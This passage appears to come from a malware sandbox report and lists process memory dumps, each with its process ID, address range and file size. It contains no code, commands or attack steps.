                                                    • memory/2576-39-0x00000000001D0000-0x000000000067D000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                    • memory/2576-84-0x00000000001D0000-0x000000000067D000-memory.dmp

                                                      Filesize

                                                      4.7MB

                                                    • memory/2808-798-0x0000000000400000-0x0000000000457000-memory.dmp

                                                      Filesize

                                                      348KB

                                                    • memory/3336-111-0x0000000000400000-0x0000000000457000-memory.dmp

                                                      Filesize

                                                      348KB

                                                    • memory/3336-113-0x0000000000400000-0x0000000000457000-memory.dmp

                                                      Filesize

                                                      348KB

                                                    • memory/3336-115-0x0000000000400000-0x0000000000457000-memory.dmp

                                                      Filesize

                                                      348KB

                                                    • memory/3804-88-0x0000000000400000-0x000000000064B000-memory.dmp

                                                      Filesize

                                                      2.3MB

                                                    • memory/3968-703-0x0000000010000000-0x000000001001C000-memory.dmp

                                                      Filesize

                                                      112KB

                                                    • memory/3968-760-0x0000000000400000-0x0000000000C64000-memory.dmp

                                                      Filesize

                                                      8.4MB

                                                    • memory/3968-644-0x0000000000400000-0x0000000000C64000-memory.dmp

                                                      Filesize

                                                      8.4MB

                                                    • memory/3968-824-0x0000000000400000-0x0000000000C64000-memory.dmp

                                                      Filesize

                                                      8.4MB

                                                    • memory/3968-759-0x0000000000400000-0x0000000000C64000-memory.dmp

                                                      Filesize

                                                      8.4MB

                                                    • memory/3968-841-0x0000000000400000-0x0000000000C64000-memory.dmp

                                                      Filesize

                                                      8.4MB

                                                    • memory/4636-813-0x0000000000EB0000-0x0000000001544000-memory.dmp

                                                      Filesize

                                                      6.6MB

                                                    • memory/4636-709-0x0000000000EB0000-0x0000000001544000-memory.dmp

                                                      Filesize

                                                      6.6MB

                                                    • memory/4636-110-0x0000000000EB0000-0x0000000001544000-memory.dmp

                                                      Filesize

                                                      6.6MB

                                                    • memory/4636-136-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                      Filesize

                                                      972KB

                                                    • memory/4636-595-0x0000000000EB0000-0x0000000001544000-memory.dmp

                                                      Filesize

                                                      6.6MB

                                                    • memory/5356-819-0x00000000006A0000-0x00000000009C7000-memory.dmp

                                                      Filesize

                                                      3.2MB

                                                    • memory/5356-811-0x00000000006A0000-0x00000000009C7000-memory.dmp

                                                      Filesize

                                                      3.2MB

                                                    • memory/5368-848-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/5368-847-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/5624-830-0x0000000000A70000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      2.7MB

                                                    • memory/5624-833-0x0000000000A70000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      2.7MB

                                                    • memory/5624-822-0x0000000000A70000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      2.7MB

                                                    • memory/5624-821-0x0000000000A70000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      2.7MB

                                                    • memory/5624-816-0x0000000000A70000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      2.7MB

                                                    • memory/5960-796-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/5960-788-0x0000000000FB0000-0x00000000012BE000-memory.dmp

                                                      Filesize

                                                      3.1MB